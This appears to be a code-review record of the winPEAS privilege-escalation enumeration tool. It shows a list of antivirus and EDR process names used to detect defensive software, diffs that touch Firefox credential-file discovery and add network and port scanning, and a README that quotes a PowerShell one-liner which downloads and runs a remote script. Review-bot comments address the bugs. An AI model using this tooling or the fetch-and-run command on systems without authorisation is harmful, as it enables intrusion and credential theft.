{"spf.exe" , ""},
{"sphinx.exe" , ""},
{"spoler.exe" , ""},
{"spoolcv.exe" , ""},
{"spoolsv32.exe" , ""},
{"spyxx.exe" , ""},
{"srexe.exe" , ""},
{"srng.exe" , ""},
{"ss3edit.exe" , ""},
{"ssgrate.exe" , ""},
{"ssg_4104.exe" , ""},
{"st2.exe" , ""},
{"start.exe" , ""},
{"stcloader.exe" , ""},
{"supftrl.exe" , ""},
{"support.exe" , ""},
{"supporter5.exe" , ""},
{"svchostc.exe" , ""},
{"svchosts.exe" , ""},
{"sweep95.exe" , ""},
{"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
{"symproxysvc.exe" , ""},
{"symtray.exe" , ""},
{"sysedit.exe" , ""},
{"sysmon.exe" , "Sysinternals Sysmon"},
{"sysupd.exe" , ""},
{"TaniumClient.exe" , "Tanium"},
{"taskmg.exe" , ""},
{"taskmo.exe" , ""},
{"taumon.exe" , ""},
{"tbmon.exe" , ""},
{"tbscan.exe" , ""},
{"tc.exe" , ""},
{"tca.exe" , ""},
{"tcm.exe" , ""},
{"tcpview.exe" , ""},
{"tds-3.exe" , ""},
{"tds2-98.exe" , ""},
{"tds2-nt.exe" , ""},
{"teekids.exe" , ""},
{"tfak.exe" , ""},
{"tfak5.exe" , ""},
{"tgbob.exe" , ""},
{"titanin.exe" , ""},
{"titaninxp.exe" , ""},
{"tlaservice.exe" , ""},
{"tlaworker.exe" , ""},
{"tracert.exe" , ""},
{"trickler.exe" , ""},
{"trjscan.exe" , ""},
{"trjsetup.exe" , ""},
{"trojantrap3.exe" , ""},
{"tsadbot.exe" , ""},
{"tshark.exe" , ""},
{"tvmd.exe" , ""},
{"tvtmd.exe" , ""},
{"udaterui.exe" , ""},
{"undoboot.exe" , ""},
{"updat.exe" , ""},
{"update.exe" , ""},
{"updaterui.exe" , ""},
{"upgrad.exe" , ""},
{"utpost.exe" , ""},
{"vbcmserv.exe" , ""},
{"vbcons.exe" , ""},
{"vbust.exe" , ""},
{"vbwin9x.exe" , ""},
{"vbwinntw.exe" , ""},
{"vcsetup.exe" , ""},
{"vet32.exe" , ""},
{"vet95.exe" , ""},
{"vettray.exe" , ""},
{"vfsetup.exe" , ""},
{"vir-help.exe" , ""},
{"virusmdpersonalfirewall.exe", ""},
{"vnlan300.exe" , ""},
{"vnpc3000.exe" , ""},
{"vpc32.exe" , ""},
{"vpc42.exe" , ""},
{"vpfw30s.exe" , ""},
{"vptray.exe" , ""},
{"vscan40.exe" , ""},
{"vscenu6.02d30.exe" , ""},
{"vsched.exe" , ""},
{"vsecomr.exe" , ""},
{"vshwin32.exe" , ""},
{"vsisetup.exe" , ""},
{"vsmain.exe" , ""},
{"vsmon.exe" , ""},
{"vsstat.exe" , ""},
{"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
{"vswin9xe.exe" , ""},
{"vswinntse.exe" , ""},
{"vswinperse.exe" , ""},
{"w32dsm89.exe" , ""},
{"w9x.exe" , ""},
{"watchdog.exe" , ""},
{"webdav.exe" , ""},
{"webscanx.exe" , ""},
{"webtrap.exe" , ""},
{"wfindv32.exe" , ""},
{"whoswatchingme.exe" , ""},
{"wimmun32.exe" , ""},
{"win-bugsfix.exe" , ""},
{"win32.exe" , ""},
{"win32us.exe" , ""},
{"winactive.exe" , ""},
{"window.exe" , ""},
{"windows.exe" , ""},
{"wininetd.exe" , ""},
{"wininitx.exe" , ""},
{"winlogin.exe" , ""},
{"winmain.exe" , ""},
{"winnet.exe" , ""},
{"winppr32.exe" , ""},
{"winrecon.exe" , ""},
{"winservn.exe" , ""},
{"winssk32.exe" , ""},
{"winstart.exe" , ""},
{"winstart001.exe" , ""},
{"wintsk32.exe" , ""},
{"winupdate.exe" , ""},
{"wireshark.exe" , ""},
{"wkufind.exe" , ""},
{"wnad.exe" , ""},
{"wnt.exe" , ""},
{"wradmin.exe" , ""},
{"wrctrl.exe" , ""},
{"wsbgate.exe" , ""},
{"wupdater.exe" , ""},
{"wupdt.exe" , ""},
{"wyvernworksfirewall.exe" , ""},
{"xagt.exe" , ""},
{"xpf202en.exe" , ""},
{"zapro.exe" , ""},
{"zapsetup3001.exe" , ""},
{"zatutor.exe" , ""},
/*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
{"zonealarm" , ""},
{"_avp32" , ""},
{"_avpcc" , ""},
{"rshell" , ""},
{"_avpms" , ""}*/
}; };
// reverse lookup list
public static Dictionary<string, HashSet<string>> AVVendorsByProcess = new Dictionary<string, HashSet<string>>();
static DefensiveProcesses()
{
// initialize the structure here
foreach (var kvp in Definitions)
{
var vendor = kvp.Key;
foreach (var executable in kvp.Value)
{
var sanitizedExecutable = executable.Trim().ToLower();
if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
{
AVVendorsByProcess.Add(sanitizedExecutable, new HashSet<string>() { vendor });
}
else
{
AVVendorsByProcess[sanitizedExecutable].Add(vendor);
}
}
}
}
} }
} }
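Review bot: several entries in the process list can never match a real image name because two names were run together into one string: `"navap.navapsvc.exe"`, `"sahagent.exescan32.exe"` and `"sweepnet.sweepsrv.sys.swnetsup.exe"` (and `"exe.avxw.exe"` looks like the same kind of damage). `navapsvc.exe` and `scan32.exe` already have their own entries, so these merged strings are dead weight; split or drop them. In the static constructor, `var sanitizedExecutable = executable.Trim().ToLower();` is culture-sensitive (the Turkish-I problem), so the key that ends up in `AVVendorsByProcess` can differ from what a lookup computes on a host with a different culture; use `ToLowerInvariant()` here and wherever the running process name is normalised before the lookup.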

View File

@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties(); IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName; string dnsDomain = properties.DomainName;
const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering"; const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query)) using (var search = new ManagementObjectSearcher(query))
{ {
@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = ""; string hotfixes = "";
foreach (ManagementObject quickFix in collection) foreach (ManagementObject quickFix in collection)
{ {
hotfixes += quickFix["HotFixID"].ToString() + ", "; hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
} }
results.Add("Hostname", strHostName); results.Add("Hostname", strHostName);
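Review bot: the new concatenation `hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";` prints an empty `()` whenever `InstalledOn` is null or empty for an entry, so check the value before appending the parentheses. The loop also still leaves a trailing `", "` after the last hotfix; collecting the formatted entries in a list and emitting `string.Join(", ", list)` fixes both issues.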

View File

@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}"; string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4)) if (File.Exists(firefoxCredentialFile4))
{ {
results.Add(firefoxCredentialFile4); results.Add(firefoxCredentialFile3);
} }
} }
} }
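Review bot: logic error in the `key4.db` branch: the condition is `if (File.Exists(firefoxCredentialFile4))` but the new line adds `firefoxCredentialFile3` to the results, so the `key4.db` path that was just found is dropped and a path this branch never checked is reported instead. Keep `results.Add(firefoxCredentialFile4);` here.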

View File

@ -118,6 +118,7 @@
<Reference Include="System.Core" /> <Reference Include="System.Core" />
<Reference Include="System.DirectoryServices.AccountManagement" /> <Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Management" /> <Reference Include="System.Management" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Security" /> <Reference Include="System.Security" />
<Reference Include="System.ServiceProcess" /> <Reference Include="System.ServiceProcess" />
<Reference Include="System.Transactions" /> <Reference Include="System.Transactions" />
@ -1002,6 +1003,7 @@
<Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" /> <Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" />
<Compile Include="Checks\ApplicationsInfo.cs" /> <Compile Include="Checks\ApplicationsInfo.cs" />
<Compile Include="Checks\BrowserInfo.cs" /> <Compile Include="Checks\BrowserInfo.cs" />
<Compile Include="Checks\CloudInfo.cs" />
<Compile Include="Checks\FileAnalysis.cs" /> <Compile Include="Checks\FileAnalysis.cs" />
<Compile Include="Checks\FilesInfo.cs" /> <Compile Include="Checks\FilesInfo.cs" />
<Compile Include="Checks\Globals.cs" /> <Compile Include="Checks\Globals.cs" />
@ -1038,6 +1040,11 @@
<Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" /> <Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" />
<Compile Include="Info\ApplicationInfo\InstalledApps.cs" /> <Compile Include="Info\ApplicationInfo\InstalledApps.cs" />
<Compile Include="Helpers\Beaprint.cs" /> <Compile Include="Helpers\Beaprint.cs" />
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
<Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" /> <Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
<Compile Include="Info\EventsInfo\Logon\Logon.cs" /> <Compile Include="Info\EventsInfo\Logon\Logon.cs" />
<Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" /> <Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" />
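Review bot: style point: `<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />` is inserted after `GCPInfo.cs`, breaking the alphabetical order the rest of the `<Compile>` list follows; move it between `AzureInfo.cs` and `EndpointData.cs`.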
@ -1058,7 +1065,7 @@
<Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\WSL\WSL.cs" /> <Compile Include="Info\FilesInfo\WSL\WSLHelper.cs" />
<Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" /> <Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" />
<Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" /> <Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" />
<Compile Include="Info\NetworkInfo\Enums\Protocol.cs" /> <Compile Include="Info\NetworkInfo\Enums\Protocol.cs" />
@ -1068,6 +1075,10 @@
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" /> <Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" />
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" /> <Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" />
<Compile Include="Info\NetworkInfo\NetworkConnection.cs" /> <Compile Include="Info\NetworkInfo\NetworkConnection.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetPinger.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkUtils.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkScanner.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\PortScanner.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" />

View File

@ -5,7 +5,7 @@
</StartArguments> </StartArguments>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>fileanalysis debug</StartArguments> <StartArguments>cloudinfo -network="auto" -ports="21,22,445"</StartArguments>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<StartArguments>debug</StartArguments> <StartArguments>debug</StartArguments>
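Review bot: the Debug|AnyCPU start arguments now run `cloudinfo -network="auto" -ports="21,22,445"` on every debug launch, which starts active host and port scanning against whatever network the developer's machine happens to be on; a debug profile should default to a passive check (the previous `fileanalysis debug`, or plain `debug` as the Debug|x64 profile still does). The new `-network` and `-ports` switches are also not described in the README hunk included in this change; add them to the usage section.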

View File

@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash ```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
```
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop
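Review bot: removing the closing code fence (the line of three backticks) after the `powershell` one-liner leaves the `bash` block open, so `## Advisory` and the advisory paragraph will render inside the code block; keep the fence and drop only the trailing `By Polop` line. While here, the hunk context reads `latest releas from here`; fix the typo `releas` to `release`.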